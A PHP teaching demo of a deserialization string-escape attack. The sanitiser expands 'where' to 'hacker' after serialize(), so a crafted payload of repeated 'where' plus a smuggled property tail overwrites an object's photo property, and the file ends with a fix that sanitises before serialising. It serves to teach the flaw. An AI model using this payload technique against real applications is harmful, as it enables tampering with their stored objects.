<?php

/**
 * Naive "SQL keyword" sanitiser used by the demo below.
 *
 * Two passes over the input: single quotes and backslashes become `_`
 * (length-preserving), then the five keywords — matched case-insensitively
 * and anywhere in the text, even inside other words — become the literal
 * `hacker` (NOT length-preserving: "where" is 5 bytes, "hacker" is 6).
 *
 * Security note: growing or shrinking the text is harmless on raw user input,
 * but running this over an already-serialised PHP string leaves the recorded
 * `s:N:"..."` lengths pointing at the wrong bytes, so an attacker chooses
 * where unserialize() resumes parsing. Sanitise BEFORE serialising, never
 * after; better still, avoid unserialize() on anything user-influenced.
 *
 * @param string $string Text to sanitise.
 * @return string|null Sanitised text, or null if PCRE reports an error
 *                     (plain preg_replace() behaviour, not checked here).
 */
function filter($string) {
    // Pass 1: neutralise quote and backslash characters one-for-one.
    $quoteOrBackslash = '/\'|\\\\/';
    $string = preg_replace($quoteOrBackslash, '_', $string);

    // Pass 2: keyword rewrite. This is the length-changing step.
    $keywords = '/select|insert|update|delete|where/i';
    return preg_replace($keywords, 'hacker', $string);
}

/**
 * Plain data holder used as the unserialize() target in the demo.
 *
 * Property order matters: serialize() emits `nickname` first, then `photo`,
 * and the crafted payload's tail is built around that layout. The properties
 * are left untyped; NOTE(review): adding types or reordering them would
 * change the serialize() byte layout the demo depends on — confirm before
 * touching.
 */
class profile{
    /** @var mixed Demo assigns an array holding the crafted string. */
    public $nickname = null;
    /** @var string The value the attack overwrites with "66666". */
    public $photo = "123";
}

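// --- Demo: length-changing "sanitisation" applied AFTER serialize() ---------
//
// The escape works by arithmetic, not by a PHP bug:
//   * serialize() records the nickname as s:174:"...": 145 bytes of "where"
//     repeated 29 times, plus the 29-byte tail `";}s:5:"photo";s:5:"66666";}"`.
//   * filter() rewrites each "where" (5 bytes) to "hacker" (6 bytes), so the
//     data grows by exactly 29 bytes while the `s:174:` prefix is untouched.
//   * unserialize() consumes 174 bytes of "hacker", treats the attacker's
//     `";}` as the end of the nickname array, then parses the smuggled
//     `s:5:"photo";s:5:"66666";` as the real photo property.
//   * The genuine trailing `s:5:"photo";s:3:"123";}` is never read (PHP 8.3+
//     warns "Extra data starting at offset ..." but still returns the object).
// Any replacement whose output length differs from its input can be abused
// the same way; `allowed_classes` does not help, since the smuggled data is
// for the very class the application expects.

$pro = new profile();

$payload = <<<EOF
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:5:"66666";}"
EOF;

$pro->nickname = array($payload);
$spro = serialize($pro);
var_dump($spro);                // s:174:"where..." ... s:3:"123" — lengths are honest here
$spro = filter($spro);
var_dump($spro);                // s:174:"hacker..." — prefix unchanged, payload 29 bytes longer
var_dump(unserialize($spro));   // photo is now "66666": attacker-controlled

// --- Fix: sanitise the field BEFORE serialising, never the serialised blob. --
// serialize() then records the post-filter length, so nothing can be smuggled
// past it and the trailing photo property is parsed as written.
$fixed = new profile();
$fixed->nickname = array(filter($payload));
var_dump(unserialize(serialize($fixed)));   // photo stays "123"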

?>
